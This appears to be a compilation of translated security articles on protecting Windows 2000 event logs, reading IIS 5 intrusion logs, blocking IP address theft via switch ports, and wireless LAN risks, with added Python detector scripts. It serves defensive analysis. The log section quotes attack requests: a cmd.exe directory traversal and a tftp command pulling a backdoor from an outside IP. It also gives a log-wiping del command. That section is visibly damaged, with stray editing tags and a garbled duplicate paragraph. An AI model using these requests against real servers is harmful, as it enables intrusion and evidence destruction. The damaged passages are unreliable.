Protection and Analysis of Windows "black box"


Windows is favored by network administrators for its ease of use, and a considerable number of large websites in China are built on Windows 2000/XP. The more people use Windows, the more people study its security. I would like to remind administrators that even after every available security patch has been applied, nobody knows when the next vulnerability will be discovered, so protecting the system logs deserves the same attention.
Hackers are just as interested in the system logs. Once they have broken into a system, the first thing they do is delete the log files, so that after the intrusion you can neither trace their activity nor find out what they did. Log files are as important as an airplane's "black box": they hold all the evidence of the intrusion.

Log migration and protection

Windows 2000 keeps the following logs: the application log, the security log, the system log, the DNS service log, and the FTP connection and HTTP (web) transaction logs. By default each log file has a small maximum size. The default storage locations are:
Security log file: %SystemRoot%\system32\config\SecEvent.Evt
System log file: %SystemRoot%\system32\config\SysEvent.Evt
Application log file: %SystemRoot%\system32\config\AppEvent.Evt
FTP connection log and HTTP transaction log: %SystemRoot%\system32\LogFiles\, with one sub-folder each for the FTP service and the web service; these files use the .log suffix.
</gra_replace>
<gr_replace lines="17" cat="clarify" orig="Here I refer to">
Here I refer to the log files with the default .EVT extension collectively as event logs. This section describes how to protect the event logs by relocating them. Relocation on its own is weak protection: an intruder only has to type dir c:\*.evt /s at a command prompt (use d: if the system is installed on drive D) to find where the event logs now live, so relocation must be combined with file permissions, as described below. The relocation is done through the registry. Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog there are Application, Security and System sub-keys, corresponding to the application log, the security log and the system log. To see how the registry is modified, look at the Application subkey (Figure 1).
Here I refer to the log files with the. EVT extension by default as Event Logs.ArticleThis section describes how to effectively protect Event Log shifting. Although shift is a protection method, you only need to input dir c: \ * in the command line :\*. EVT/s (if the system is installed on disk D, the drive letter is d). You can find the location of the event log. The log shift is completed by modifying the Registry. We find the HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Eventlog location in the registry, and the following application, security, and system sub-keys, corresponding to "application logs", "security logs", and "system logs" respectively ". To modify the registry, let's take a look at the application subkey, 1.

Figure 1

The File value holds the path where the application log file is stored. Change this value to the folder in which you want to keep the log file, copy %SystemRoot%\system32\config\AppEvent.Evt into that folder, and restart the machine. The point of moving the file is to take full advantage of the "Security" attributes that Windows 2000 provides on NTFS volumes; as long as the log stays in its default location, its permissions cannot be adjusted independently. After the move, right-click the new folder, choose "Properties" and open the "Security" tab. Clear "Allow inheritable permissions from parent to propagate to this object", add the SYSTEM group, grant Everyone only "Read", and grant SYSTEM "Full Control" and "Modify". Then raise the default log file size to the value you want, for example 20 MB.
With these settings in place, a command such as del c:\*.evt /s /q, which would otherwise delete log files from the command line even while the system is using them, can no longer remove them.

Log file backup

WMI-based Log backup script
WMI (Windows Management Instrumentation) is the system management interface that Microsoft provides for Windows; scripts written against WMI run on Windows 2000 and NT. Microsoft publishes a script that uses WMI to set the log file size to 25 MB and to let the log automatically overwrite entries older than 14 days. (Editor's note: for reasons of space the script is not reproduced here. Readers who need it can obtain it from the Microsoft website or request it from the editor.)
Save the script as a file with the .vbs extension and it is ready to run. The same script can also be modified to back up the log files. During the backup I suggest changing the .EVT suffix to some other suffix (for example .c) so that the backups are harder for an attacker to find.

Backup Using dumpel
dumpel.exe from the Microsoft Resource Kit can also back up log files. Its syntax is:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3 ...] [-r] [-t] [-d x]
-s \\server: dump the log of a remote computer; omit it for the local machine.
-f file: path and file name of the output log.
-l log: the log to dump, one of system, security, application or dns.
To dump the system log of the target server into systemlog.log, use:
dumpel -s \\server -l system -f systemlog.log
Combined with the Scheduled Tasks service, this gives a regular backup of the system log.

Httpd transaction log analysis

Since Microsoft released IIS 5, hackers have exploited many of its vulnerabilities: the .ida/.idq (indexing service) flaws, the Unicode directory traversal, the WebDAV (webdavx3) overflow, and some that have not been made public. We back up the logs precisely so that intrusions can be analysed; the records below come from successful intrusions of systems without the relevant patches.

Unicode vulnerability intrusion Logging
Open the IIS 5 web service log file, which by default sits under %SystemRoot%\system32\LogFiles\. Figure 2 shows a typical log record of a Unicode vulnerability intrusion. A normal web access issues a GET request on port 80 to fetch web data; the vulnerability lets an attacker bypass the server's character checks with malformed (overlong Unicode) encodings of the path and so obtain data the server was never meant to return. Applying the corresponding patch closes this hole.

Figure 2

For example, the following encoded request lists a directory on the target machine:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
This access is recorded in the log as:
2003-001 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
The log shows clearly that an attacker at 192.168.0.1 was able to list our directories (status 200 means the request succeeded). The next line records the attacker transferring a backdoor program onto our machine:
2003-001 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll 502 -

Webdavx3 remote overflow Logging
Recently the well-known webdavx3 vulnerability has become the most widely used one in the hacker community; even systems with the latest SP3 patch are not spared. If the system suffers this remote overflow attack, the log looks like Figure 3.

Figure 3

The relevant line in the figure is:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK /AAAAA......
It shows that our web service was attacked from 192.168.0.218 with a WebDAV LOCK request and that the web service was locked up (that is, disabled). The run of garbage characters is the attacker guessing the offset used in the overflow.
The records above give the IP addresses from which the intrusions came. It cannot be ruled out that such an address is merely a stepping stone, in other words a "zombie" host rather than the attacker's own machine; nevertheless, by cross-checking the other log files it is often still possible to trace the attacker's location.
Finally, I would add that it is best to install a firewall as well, both to record and to block hacker activity.
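The Unicode traversal records and the WebDAV LOCK record above are both easy to pick out of an IIS 5 W3C extended log mechanically. The following Python script is an added example, not part of the original article: it parses the log's field layout (from the #Fields: header, or IIS 5's default order when the header is absent), decodes the request path twice so that %5c and double-encoded variants both become visible, and flags traversal to cmd.exe, tftp transfers through cmd.exe, and oversized LOCK requests. The sample log lines are constructed for the example, modelled on the records quoted above; the 256-byte LOCK threshold is an assumption chosen for illustration, not a value from the article.

```python
"""Flag the IIS 5 intrusion patterns described above in W3C extended log lines (added example)."""
from urllib.parse import unquote

# IIS 5 default W3C extended field order, used when the log carries no "#Fields:" header.
DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-username", "s-ip", "s-port",
                  "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status", "cs(User-Agent)"]

# Constructed sample log, modelled on the records quoted in the article (not real traffic).
SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Services 5.0\n"
    "#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)\n"
    "2003-01-01 08:46:10 192.168.0.5 - 192.168.0.218 80 GET /index.htm - 200 Mozilla/4.0\n"
    "2003-01-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET "
    "/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -\n"
    "2003-01-01 08:47:49 192.168.0.1 - 192.168.0.218 80 GET "
    "/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe "
    "/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\\httpodbc.dll 502 -\n"
    "2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK /" + "A" * 300 + " - - -\n"
)

LOCK_LENGTH_THRESHOLD = 256  # assumed cut-off for "oversized" LOCK paths; normal WebDAV paths are far shorter


def parse_iis_log(text):
    """Turn W3C extended log text into a list of field-name -> value dicts."""
    fields = DEFAULT_FIELDS
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()  # honour the log's own field order
            continue
        values = line.split(None, len(fields) - 1)
        if len(values) != len(fields):
            continue  # truncated or corrupted line; skip rather than mis-assign fields
        records.append(dict(zip(fields, values)))
    return records


def decode_uri(uri):
    """Decode percent-encoding twice (catches %255c style double encoding) and normalise slashes."""
    return unquote(unquote(uri)).replace("\\", "/").lower()


def classify(record):
    """Return the list of reasons this record looks like one of the attacks described in the article."""
    reasons = []
    stem = decode_uri(record["cs-uri-stem"])
    query = decode_uri(record["cs-uri-query"]).replace("+", " ")
    method = record["cs-method"].upper()
    if "../" in stem and "cmd.exe" in stem:
        reasons.append("directory traversal to cmd.exe (Unicode / %5c encoding)")
        if "tftp" in query:
            reasons.append("file transfer via tftp through cmd.exe")
    if method == "LOCK" and len(record["cs-uri-stem"]) > LOCK_LENGTH_THRESHOLD:
        reasons.append("oversized WebDAV LOCK request (possible webdavx3 overflow)")
    return reasons


def scan(text):
    """Scan a whole log and return one alert per suspicious record."""
    alerts = []
    for rec in parse_iis_log(text):
        reasons = classify(rec)
        if reasons:
            alerts.append({
                "time": rec["date"] + " " + rec["time"],
                "client": rec["c-ip"],
                "method": rec["cs-method"],
                "status": rec["sc-status"],   # "200" means the attacker's request succeeded
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["method"], alert["status"], "; ".join(alert["reasons"]))
```

Run it over a real ex*.log file by reading the file into `scan()`; the status field tells you at a glance which of the flagged requests actually succeeded (200) and which failed, which is the first thing to establish when reconstructing an intrusion from backed-up logs.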
Keep an eye on your IP address
-- Managing switch ports to prevent IP address theft
■ Gao Xiuxia, Beijing
IP address theft is very common today. Many attackers steal addresses to avoid being tracked and to hide their identity. IP address theft infringes on the rights of legitimate network users and seriously harms network security and normal network operation, so finding effective countermeasures is an urgent issue.

Common Methods for IP address theft and their prevention mechanisms

IP address theft means configuring a computer on the network with an IP address that it is not authorized to use. It takes two forms:
The first is simply changing the IP address. Whenever a host is configured, or reconfigured, with an address that was not legitimately assigned to it, the address is stolen. Because an IP address is a logical, protocol-level address that must be settable and can be changed at any time, there is no way to stop a user from changing the IP address of his own machine.
The second is changing the IP address and the MAC address together. Many organizations rely on IP-MAC binding to deal with plain IP changes, but binding cannot stop users from changing the IP-MAC pair as a whole. The MAC address is the hardware address of the network device; on Ethernet it is also called the NIC address. Every NIC's MAC address is supposed to be unique among all Ethernet devices: it is allocated by the IEEE and burned into the card. Some compatible NICs, however, allow the MAC address to be changed with a configuration utility. If a user sets both the IP address and the MAC address of a computer to those of another, legitimate host, IP-MAC binding is powerless. Even on NICs whose MAC address cannot be changed directly, the address can be changed in software, by modifying the lower network layers so that they spoof the upper-layer software.
The detection method in common use today is to periodically scan the ARP (Address Resolution Protocol) tables of the network's routers to obtain the current IP addresses and IP-MAC mappings, and to compare them with the table of valid IP addresses and valid IP-MAC pairs; any inconsistency indicates illegal access. IP address theft can also be detected from user fault reports, since a host whose address is being stolen sees a MAC address conflict message. The common prevention mechanisms built on this are IP-MAC binding, proxy servers, IP-MAC-USER authentication and authorization, and transparent gateways.
Each of these has limitations: with IP-MAC binding, user management is very difficult; a transparent gateway needs a dedicated machine for forwarding, which easily becomes a bottleneck. More importantly, none of them fully prevents the damage done by IP address theft; they only stop the thief from reaching external network resources directly. Because the thief still has complete freedom to act within the IP subnet, on the one hand he interferes with legitimate users, and on the other he can exploit this position to attack other machines and network devices in the subnet. If there is a proxy server in the subnet, he can also reach external resources by various means.

Use Port location and block IP address theft

The switch is the main network device of a LAN. It works at the data link layer and forwards and filters frames by MAC address, so every switch maintains a table mapping MAC addresses to ports; the MAC address of every host directly attached to the switch, or in the same broadcast domain, appears in that table. An SNMP (Simple Network Management Protocol) management station can talk to the SNMP agent in each switch and retrieve its port-to-MAC table, building a real-time switch-port-MAC table for the whole network. Comparing this real-time table with the complete table of valid bindings prepared in advance quickly shows whether an illegal MAC address has appeared on any switch port, and from there whether IP address theft has occurred. If the same MAC address appears at the same time on non-cascade ports of different switches, the IP-MAC pair has been stolen.
Once theft is detected, the switch port involved is already known, so a lookup in the complete switch-port-MAC table built in advance immediately locates the room in which the theft is taking place.
As soon as the theft is located, steps can be taken to contain its effects: the management station sends an SNMP message to the switch agent to shut down the port on which the stolen address appears. The machine using the stolen address then cannot communicate with any other machine on the network, and of course cannot disturb the normal operation of other machines either.
Shutting down a port means changing its administrative status. The MIB (Management Information Base) contains a read/write object, ifAdminStatus (object identifier 1.3.6.1.2.1.2.2.1.7), that represents the port's administrative status. Assigning different values to ifAdminStatus changes that status: 1 enables the port (up), 2 disables it (down), and 3 puts it into testing mode.
The management station therefore disables or enables a port by sending a set request to the switch. For example, to disable a port on the switch at 192.168.1.1, it sends:
set("private" 192.168.1.1 1.3.6.1.2.1.2.2.1.7.2.0.2)
Combined with IP-MAC binding, switch port management lets you find and block IP address theft quickly in practice, in particular theft of the whole IP-MAC pair, without affecting the efficiency of the network.
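The comparison and blocking procedure described in this section, as an added Python example that is not part of the original article. The switch-port table, the authorized IP-MAC-port bindings and the "real-time" table polled from the switches are all constructed sample data; the example compares them, reports unknown MACs and stolen IP-MAC pairs with the room each port serves, and produces the SNMP SET (ifAdminStatus instance for the port, value 2) that the management station would send. It builds the request but does not send it, so it runs offline; the community string "private" is taken from the article's example and the switch addresses are assumed.

```python
"""Locate IP address theft from switch-port MAC tables and derive the blocking SNMP SET (added example)."""
from collections import defaultdict

IF_ADMIN_STATUS = "1.3.6.1.2.1.2.2.1.7"   # ifAdminStatus column of IF-MIB's ifTable
ADMIN_UP, ADMIN_DOWN, ADMIN_TESTING = 1, 2, 3

# Constructed: the complete switch-port table prepared in advance.
# (switch address, ifIndex) -> (room served by the port, is this a cascade/uplink port?)
PORTS = {
    ("192.168.1.1", 2): ("Room 101", False),
    ("192.168.1.1", 3): ("Room 102", False),
    ("192.168.1.1", 4): ("Room 103", False),
    ("192.168.1.1", 24): ("uplink", True),
    ("192.168.1.2", 2): ("Room 201", False),
    ("192.168.1.2", 24): ("uplink", True),
}

# Constructed: authorized bindings, MAC -> (IP address, (switch, ifIndex)).
AUTHORIZED = {
    "00:11:22:33:44:01": ("10.0.0.11", ("192.168.1.1", 2)),
    "00:11:22:33:44:02": ("10.0.0.12", ("192.168.1.1", 3)),
}

# Constructed: real-time switch-port-MAC table as it would be collected over SNMP.
# Room 201 carries a copy of Room 101's MAC (pair theft); Room 103 carries a MAC nobody registered.
LIVE = {
    ("192.168.1.1", 2): {"00:11:22:33:44:01"},
    ("192.168.1.1", 3): {"00:11:22:33:44:02"},
    ("192.168.1.1", 4): {"00:11:22:33:44:77"},
    ("192.168.1.1", 24): {"00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:77"},
    ("192.168.1.2", 2): {"00:11:22:33:44:01"},
    ("192.168.1.2", 24): {"00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:77"},
}


def detect_theft(live, ports=PORTS, authorized=AUTHORIZED):
    """Compare the live table with the valid bindings; return (findings, duplicated MACs)."""
    findings = []
    seen_on = defaultdict(set)   # MAC -> non-cascade ports on which it currently appears
    for port, macs in live.items():
        room, cascade = ports[port]
        if cascade:
            continue   # a cascade port legitimately carries every MAC behind it
        for mac in sorted(macs):
            seen_on[mac].add(port)
            binding = authorized.get(mac)
            if binding is None:
                findings.append({"port": port, "room": room, "mac": mac, "kind": "unknown MAC"})
            elif binding[1] != port:
                findings.append({"port": port, "room": room, "mac": mac,
                                 "kind": "IP-MAC pair theft", "ip": binding[0]})
    # Same MAC on non-cascade ports of different switches at the same time: pair theft by definition.
    duplicated = sorted(mac for mac, where in seen_on.items() if len({sw for sw, _ in where}) > 1)
    return findings, duplicated


def block_actions(findings, community="private"):
    """Translate findings into the SNMP SET requests (switch, community, OID, value) that shut the ports."""
    actions = {(f["port"][0], community, f"{IF_ADMIN_STATUS}.{f['port'][1]}", ADMIN_DOWN) for f in findings}
    return sorted(actions)


if __name__ == "__main__":
    found, dupes = detect_theft(LIVE)
    for f in found:
        print(f"{f['kind']}: {f['mac']} on {f['port'][0]} ifIndex {f['port'][1]} ({f['room']})")
    print("MACs seen on several switches:", dupes)
    for action in block_actions(found):
        print("SNMP SET", action)
```

In a real deployment the live table comes from walking each switch's bridge forwarding table and `block_actions()` output is handed to an SNMP library to send; keeping detection separate from the SET itself makes it easy to review what would be shut down before any port goes down, which matters because a wrong entry in the prepared table would otherwise disconnect a legitimate user.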

Wireless LAN:
many ways in for thieves
■ Xiamen
Wireless LANs (WLANs) are now used more and more widely, but WLAN security has a number of hidden dangers, many of which let thieves in. Any wireless access point (AP) and any ad hoc network in which computers connect directly to one another is a big gap in enterprise information security. Below we examine them one by one.

Unauthorized AP
Unauthorized wireless access points (APs) are today's biggest source of information leakage. An uncontrolled AP usually does not even have basic Wired Equivalent Privacy (WEP) encryption enabled, and even where WEP is on, attackers can use tools such as AirSnort and NetStumbler to intercept WLAN traffic across the company network. The company must set rules that penalize the installation of APs without authorization, and must first of all strengthen its information security with multi-layered protection against every kind of intrusion.

Uncontrolled wireless laptop Network
Unauthorized wireless devices are entering the enterprise through every wireless technology. Intel's new Centrino wireless chipset means every new laptop comes with a WLAN adapter, and all of them need security checks. Unauthorized WLAN-capable platforms must be protected so that users cannot be connected to unknown WLANs or to a hacker's computer, which can lead to theft of the data on the machine. A compromised WLAN can become a gap in the security of the enterprise's whole computer network.

Ad Hoc Network
Like uncontrolled APs, ad hoc wireless networks are a security worry, because the network administrator has no control at all over the information security of laptops. A WLAN card lets laptops exchange information even when no AP is present, and these ad hoc networks allow two computers to transfer information freely. When a WLAN card operates in ad hoc mode, the user is effectively trusting every platform within radio range. Ad hoc networks offer very little authentication or security protection, so a malicious platform can connect directly to a user on the ad hoc network and through it to the enterprise network.

When the data transmission rate is too slow
An 802.11b WLAN should give enterprise users a data rate of 5.5 Mbps or 11 Mbps. If only a slow rate such as 1 Mbps or 2 Mbps is being achieved, hackers may be conducting illegal activity on the network.

Access to the enterprise virtual private network (VPN) through an AP without authentication
Security-conscious enterprises identify every user before the VPN entry point. Many enterprises pay no attention to this, so users coming from the WLAN can reach the VPN without any authentication.

Link through neighboring AP sensing
WLAN radio signals do not stop at the office walls. A computer may inadvertently associate with a neighbouring enterprise's WLAN and leak passwords or sensitive files to it.

Non-standard WLAN cards
Enterprise WLANs should be built from Wi-Fi certified equipment, which provides the necessary network security and management functions. Non-standard WLAN cards and APs carry a risk of leakage.

Service Set Identifier (SSID) leakage
The SSID (Service Set Identifier) reflects the nature and name of the WLAN, and SSIDs are transmitted in the clear along with the rest of the WLAN traffic. Enterprises should therefore be careful not to disclose information in the SSID. Avoid department names such as human resources, accounting or engineering: an SSID like that invites hackers into the WLAN to look for personnel files, financial records or technical information.

Insecure Windows XP Automatic settings
WLAN security policy should be enforced on every wireless platform and device, but some of Windows XP's automatic settings increase the risk. A laptop will actively probe for and connect to nearby APs and insecure devices: it automatically joins any unapproved wireless network, sends probes looking for APs it has connected to before, and can communicate directly with other laptops.

Disable WLAN after work
WLAN radio signals can cross between buildings. Many enterprises now restrict WLAN use to working hours so that hackers cannot lie in wait for the servers at night; the APs are simply switched off outside working hours.
